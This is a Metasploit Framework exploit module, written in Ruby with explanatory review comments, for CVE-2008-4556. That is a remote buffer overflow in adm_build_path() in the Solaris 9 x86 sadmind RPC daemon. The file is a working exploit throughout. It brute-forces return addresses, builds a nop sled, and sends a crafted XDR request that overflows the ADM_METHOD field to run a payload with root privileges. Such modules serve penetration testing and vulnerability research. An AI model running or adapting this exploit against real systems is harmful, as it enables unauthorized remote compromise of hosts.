GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/exploits/solaris/sunrpc/sadmind_adm_build_path.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
  # Remote exploit module for the adm_build_path() buffer overflow in the
  # Solaris sadmind RPC service (RPC program 100232, version 10, over UDP).
  # Msf::Exploit::Brute drives execution: it calls brute_exploit once per
  # candidate 'Ret' value taken from the selected target's 'Bruteforce' range.
  Rank = GreatRanking

  include Msf::Exploit::Remote::SunRPC
  include Msf::Exploit::Brute

  # Module metadata: name, description, references, payload constraints,
  # targets and operational notes.
  #
  # Targets: the default brute-force target walks 'Ret' from 0x08062030 to
  # 0x08072030 in 30720-byte steps with a 32768-byte nop sled (sled larger
  # than step, so consecutive guesses overlap); the second target uses a
  # single fixed address; 'Debug' uses the placeholder 0xaabbccdd.
  #
  # Notes declare that the service crashes and restarts and that the attempts
  # leave artifacts in logs — relevant for detection on the target side.
  #
  # @param info [Hash] base info hash supplied by the framework
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Sun Solaris sadmind adm_build_path() Buffer Overflow',
        'Description' => %q{
          This module exploits a buffer overflow vulnerability in adm_build_path()
          function of Sun Solstice AdminSuite sadmind daemon.

          The distributed system administration daemon (sadmind) is the daemon used by
          Solstice AdminSuite applications to perform distributed system administration
          operations.

          The sadmind daemon is started automatically by the inetd daemon whenever a
          request to invoke an operation is received. The sadmind daemon process
          continues to run for 15 minutes after the last request is completed, unless a
          different idle-time is specified with the -i command line option. The sadmind
          daemon may be started independently from the command line, for example, at
          system boot time. In this case, the -i option has no effect; sadmind continues
          to run, even if there are no active requests.
        },
        'Author' => [
          'Ramon de C Valle',
          'Adriano Lima <adriano[at]risesecurity.org>',
        ],
        'Arch' => ARCH_X86,
        'Platform' => 'solaris',
        'References' => [
          ['CVE', '2008-4556'],
          ['OSVDB', '49111'],
          ['URL', 'https://web.archive.org/web/20081201000000*/https://risesecurity.org/advisories/RISE-2008001.txt'],
        ],
        'Privileged' => true,
        'License' => MSF_LICENSE,
        # Payload constraints: up to 1024 bytes, NUL byte not allowed.
        'Payload' => {
          'Space' => 1024,
          'BadChars' => "\x00"
        },
        'Targets' => [
          [
            'Sun Solaris 9 x86 Brute Force',
            {
              'Arch' => [ ARCH_X86 ],
              'Platform' => 'solaris',
              'Nops' => 1024 * 32,
              'Bruteforce' =>
              {
                'Start' => { 'Ret' => 0x08062030 },
                'Stop' => { 'Ret' => 0x08072030 },
                'Step' => 1024 * 30
              }
            }
          ],
          [
            'Sun Solaris 9 x86',
            {
              'Nops' => 1024 * 4,
              # Start == Stop with Step 1: a single attempt at a fixed address.
              'Bruteforce' =>
              {
                'Start' => { 'Ret' => 0x08066a60 + 2048 },
                'Stop' => { 'Ret' => 0x08066a60 + 2048 },
                'Step' => 1
              }
            }
          ],
          [
            'Debug',
            {
              'Nops' => 1024 * 4,
              # Placeholder address; useful for inspecting the request on the wire.
              'Bruteforce' =>
              {
                'Start' => { 'Ret' => 0xaabbccdd },
                'Stop' => { 'Ret' => 0xaabbccdd },
                'Step' => 1
              }
            }
          ],
        ],
        'DefaultTarget' => 0,
        'DisclosureDate' => '2008-10-14',
        'Notes' => {
          'Stability' => [CRASH_SERVICE_RESTARTS],
          'Reliability' => [REPEATABLE_SESSION],
          'SideEffects' => [IOC_IN_LOGS]
        }
      )
    )
  end

  # Probe for the service: create an RPC binding to program 100232 version 10
  # over UDP and report Detected when a port comes back, Safe otherwise.
  # This only establishes that the program is reachable; it does not confirm
  # a vulnerable build, hence Detected rather than a stronger check code.
  #
  # NOTE(review): brute_exploit rescues RPCTimeout/RPCError around the same
  # call but check does not; confirm whether sunrpc_create returns nil or
  # raises when the lookup fails, since a raise here would surface as an
  # exception instead of CheckCode::Safe.
  #
  # @return [Msf::Exploit::CheckCode]
  def check
    port = sunrpc_create('udp', 100232, 10)
    port.nil? ? CheckCode::Safe : CheckCode::Detected
  ensure
    # Release the RPC client whether or not the lookup succeeded.
    sunrpc_destroy unless rpcobj.nil?
  end

  # One brute-force iteration: build a single sadmind request whose
  # ADM_METHOD argument overflows adm_build_path() with brute_target['Ret']
  # as the overwritten return address, then send it with a short timeout.
  #
  # @param brute_target [Hash] current candidate; 'Ret' is the address under test
  # @return [nil]
  def brute_exploit(brute_target)
    begin
      sunrpc_create('udp', 100232, 10)
    rescue Rex::Proto::SunRPC::RPCTimeout, Rex::Proto::SunRPC::RPCError => e
      # Service not reachable for this attempt: log (verbose only) and return
      # so the Brute mixin can continue with the next candidate.
      vprint_error(e.to_s)
      return
    end

    # The nop sled is built once and cached in @nops across iterations. An
    # empty string (target 'Nops' of 0) is truthy, so the cache still holds.
    unless @nops
      print_status('Creating nop block...')
      if target['Nops'] > 0
        @nops = make_nops(target['Nops'])
      else
        @nops = ''
      end
    end

    print_status('Trying to exploit sadmind with address 0x%.8x...' % brute_target['Ret'])

    hostname = 'localhost'

    # buf1 = rand_text_alpha(1017) + [brute_target['Ret']].pack('L')
    # Overflowing ADM_METHOD value: 1017 bytes of fixed filler (the randomized
    # variant above is commented out) followed by the candidate return address
    # packed as a 32-bit native-endian word ('L').
    buf1 = 'A' * 1017 + [brute_target['Ret']].pack('L')
    # Second string argument: nop sled followed by the encoded payload.
    buf2 = @nops + payload.encoded

    # Request header: seven zero words, then a fixed field list. 0x7f000001 is
    # 127.0.0.1 and 100232/10 repeat the program/version; the meaning of the
    # other fields is not documented here — presumably the sadmind/netmgt
    # request envelope, confirm against the protocol description.
    header = Rex::Encoder::XDR.encode(0) * 7
    header << Rex::Encoder::XDR.encode(
      6, 0, 0, 0, 4, 0, 4, 0x7f000001, 100232, 10,
      4, 0x7f000001, 100232, 10, 17, 30, 0, 0, 0, 0,
      hostname, 'system', rand_text_alpha(16)
    )

    # Argument list as name/value records (see do_int / do_string), closed by
    # the 'netmgt_endofargs' marker. ADM_METHOD carries the overflow (buf1)
    # and 'X' carries the sled plus payload (buf2).
    body =
      do_int('ADM_FW_VERSION', 1) +
      do_string('ADM_LANG', 'C') +
      do_string('ADM_REQUESTID', '00009:000000000:0') +
      do_string('ADM_CLASS', 'system') +
      do_string('ADM_CLASS_VERS', '2.1') +
      do_string('ADM_METHOD', buf1) +
      do_string('ADM_HOST', hostname) +
      do_string('ADM_CLIENT_HOST', hostname) +
      do_string('ADM_CLIENT_DOMAIN', '') +
      do_string('ADM_TIMEOUT_PARMS', 'TTL=0 PTO=20 PCNT=2 PDLY=30') +
      do_int('ADM_FENCE', 0) +
      do_string('X', buf2) +
      Rex::Encoder::XDR.encode('netmgt_endofargs')

    # Length word between header and body. The fixed 326 adjustment is not
    # explained in this file; it is presumably a protocol offset.
    request = header + Rex::Encoder::XDR.encode(header.length + body.length - 326) + body

    begin
      # two seconds timeout for brute force
      # Procedure 1. A timeout is treated as the normal outcome (the status
      # message below); only a protocol-level RPCError is reported as an error.
      sunrpc_call(1, request, 2)
    rescue Rex::Proto::SunRPC::RPCTimeout
      print_status('Server did not respond, this is expected')
    rescue Rex::Proto::SunRPC::RPCError => e
      print_error(e.to_s)
    end
  ensure
    # Tear down the RPC client on every path, including the early return above.
    sunrpc_destroy unless rpcobj.nil?
  end

  # Encode one string-valued argument as an XDR record: name, tag 9, value
  # length plus one (trailing NUL), value, then two zero words. The tag value
  # is not explained in this file.
  #
  # NOTE(review): str2.length is a character count; it equals the byte count
  # only for binary/ASCII strings, which appears to be the case for every
  # caller here — confirm.
  #
  # @param str1 [String] argument name, e.g. 'ADM_CLASS'
  # @param str2 [String] argument value
  # @return [String] XDR-encoded record
  def do_string(str1, str2)
    Rex::Encoder::XDR.encode(str1, 9, str2.length + 1, str2, 0, 0)
  end

  # Encode one integer-valued argument as an XDR record: name, tag 3, length 4,
  # value, then two zero words. The tag value is not explained in this file.
  #
  # @param str [String] argument name, e.g. 'ADM_FENCE'
  # @param int [Integer] argument value
  # @return [String] XDR-encoded record
  def do_int(str, int)
    Rex::Encoder::XDR.encode(str, 3, 4, int, 0, 0)
  end
end